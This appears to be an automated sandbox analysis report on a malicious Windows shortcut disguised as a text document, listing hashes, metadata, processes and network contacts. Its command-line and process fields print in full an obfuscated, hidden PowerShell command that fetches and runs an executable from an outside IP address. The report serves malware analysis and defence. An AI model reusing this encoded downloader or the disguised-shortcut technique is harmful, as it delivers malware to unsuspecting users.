File name: | 668e68df81631d3ad7c8c5dc4babbce8fdfb4da309dd57822e0fd71568512de5 |
Full analysis: | https://app.any.run/tasks/edf8e104-cd8e-4513-9b4e-577bd5895c9d |
Verdict: | Malicious activity |
Analysis date: | June 12, 2019, 11:48:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=70, Archive, ctime=Sun Nov 20 18:45:32 2016, mtime=Sun Nov 20 19:43:35 2016, atime=Sun Nov 20 18:45:32 2016, length=446976, window=hidenormalshowminimized |
MD5: | D12C7676DAF58429DE228E4C811FD139 |
SHA1: | 34EE0C04A434CB96DBAD7CBF25D9B464DE42797E |
SHA256: | 668E68DF81631D3AD7C8C5DC4BABBCE8FDFB4DA309DD57822E0FD71568512DE5 |
SSDEEP: | 48:80lSW29zneLNOq2DYomGmPL7PTqiNSwqvoglVLT9TbIFg8ab:80sFyLsq5Brzdqvo4FTba |
.lnk | | | Windows Shortcut (100) |
---|
MachineID: | desktop-nhnj8e6 |
---|---|
IconFileName: | %SystemRoot%\SYSTEM32\shell32.dll |
CommandLineArguments: | -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand YwBtAGQAIAAvAGMAIAAiACQARQBuAHYAOgB3AGkAbgBkAGkAcgBcAG4AbwB0AGUAcABhAGQALgBlAHgAZQAiADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADQANQAuADMAMgAuADEAOAA0AC4ANAAwADoAMgA0ADEANgAzAC8AZABvAHcAbgBsAG8AYQBkAC4AcABoAHAAIgAsACAAIgAkAEUAbgB2ADoAVABFAE0AUABcADEAMgBhADgAOAAwADYANQA4AGIANQAwADcAZgAzADgAOAAzAGIAMAA5AGIAYgAxAGQAZgAwADUAYwA0ADMAYgAuAGUAeABlACIAKQA7ACAAYwBtAGQAIAAvAGMAIAAiACQARQBuAHYAOgBUAEUATQBQAFwAMQAyAGEAOAA4ADAANgA1ADgAYgA1ADAANwBmADMAOAA4ADMAYgAwADkAYgBiADEAZABmADAANQBjADQAMwBiAC4AZQB4AGUAIABRADIAVgB3AGEARwBGAHMAYgB5AEEAbwBRAG0AVgAwAFkAUwBrAD0AIgA7AA== |
RelativePath: | ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Description: | Text Document |
LocalBasePath: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
VolumeLabel: | - |
DriveType: | Fixed Disk |
TargetFileDOSName: | powershell.exe |
HotKey: | (none) |
RunWindow: | Show Minimized No Activate |
IconIndex: | 70 |
TargetFileSize: | 446976 |
ModifyDate: | 2016:11:20 20:45:32+01:00 |
AccessDate: | 2016:11:20 21:43:35+01:00 |
CreateDate: | 2016:11:20 20:45:32+01:00 |
FileAttributes: | Archive |
Flags: | IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3244 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand YwBtAGQAIAAvAGMAIAAiACQARQBuAHYAOgB3AGkAbgBkAGkAcgBcAG4AbwB0AGUAcABhAGQALgBlAHgAZQAiADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADQANQAuADMAMgAuADEAOAA0AC4ANAAwADoAMgA0ADEANgAzAC8AZABvAHcAbgBsAG8AYQBkAC4AcABoAHAAIgAsACAAIgAkAEUAbgB2ADoAVABFAE0AUABcADEAMgBhADgAOAAwADYANQA4AGIANQAwADcAZgAzADgAOAAzAGIAMAA5AGIAYgAxAGQAZgAwADUAYwA0ADMAYgAuAGUAeABlACIAKQA7ACAAYwBtAGQAIAAvAGMAIAAiACQARQBuAHYAOgBUAEUATQBQAFwAMQAyAGEAOAA4ADAANgA1ADgAYgA1ADAANwBmADMAOAA4ADMAYgAwADkAYgBiADEAZABmADAANQBjADQAMwBiAC4AZQB4AGUAIABRADIAVgB3AGEARwBGAHMAYgB5AEEAbwBRAG0AVgAwAFkAUwBrAD0AIgA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1508 | "C:\Windows\system32\cmd.exe" /c C:\Windows\notepad.exe | C:\Windows\system32\cmd.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2360 | C:\Windows\notepad.exe | C:\Windows\notepad.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2344 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand YwBtAGQAIAAvAGMAIAAiACQARQBuAHYAOgB3AGkAbgBkAGkAcgBcAG4AbwB0AGUAcABhAGQALgBlAHgAZQAiADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADQANQAuADMAMgAuADEAOAA0AC4ANAAwADoAMgA0ADEANgAzAC8AZABvAHcAbgBsAG8AYQBkAC4AcABoAHAAIgAsACAAIgAkAEUAbgB2ADoAVABFAE0AUABcADEAMgBhADgAOAAwADYANQA4AGIANQAwADcAZgAzADgAOAAzAGIAMAA5AGIAYgAxAGQAZgAwADUAYwA0ADMAYgAuAGUAeABlACIAKQA7ACAAYwBtAGQAIAAvAGMAIAAiACQARQBuAHYAOgBUAEUATQBQAFwAMQAyAGEAOAA4ADAANgA1ADgAYgA1ADAANwBmADMAOAA4ADMAYgAwADkAYgBiADEAZABmADAANQBjADQAMwBiAC4AZQB4AGUAIABRADIAVgB3AGEARwBGAHMAYgB5AEEAbwBRAG0AVgAwAFkAUwBrAD0AIgA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3256 | "C:\Windows\system32\cmd.exe" /c C:\Windows\notepad.exe | C:\Windows\system32\cmd.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3500 | C:\Windows\notepad.exe | C:\Windows\notepad.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2772 | "C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\12a880658b507f3883b09bb1df05c43b.exe Q2VwaGFsbyAoQmV0YSk=" | C:\Windows\system32\cmd.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3244 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QNZ8NLZR6Q2HFSPGHILK.temp | — | |
MD5:— | SHA256:— | |||
2344 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AX3T072MNSP1OTX3C2LQ.temp | — | |
MD5:— | SHA256:— | |||
3244 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7ee143d85a1cebd7.customDestinations-ms | binary | |
MD5:15182286E3E65CA1EC1FA272CAEE8935 | SHA256:0C916A3341D850228441EDB5956EE94192E50E7E1B90C9549D066F6B6ACBA631 | |||
2344 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1349d9254a3172e3.customDestinations-ms | binary | |
MD5:15182286E3E65CA1EC1FA272CAEE8935 | SHA256:0C916A3341D850228441EDB5956EE94192E50E7E1B90C9549D066F6B6ACBA631 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3244 | powershell.exe | 45.32.184.40:24163 | — | Choopa, LLC | NL | malicious |
Domain | IP | Reputation |
---|---|---|
dns.msftncsi.com |
| shared |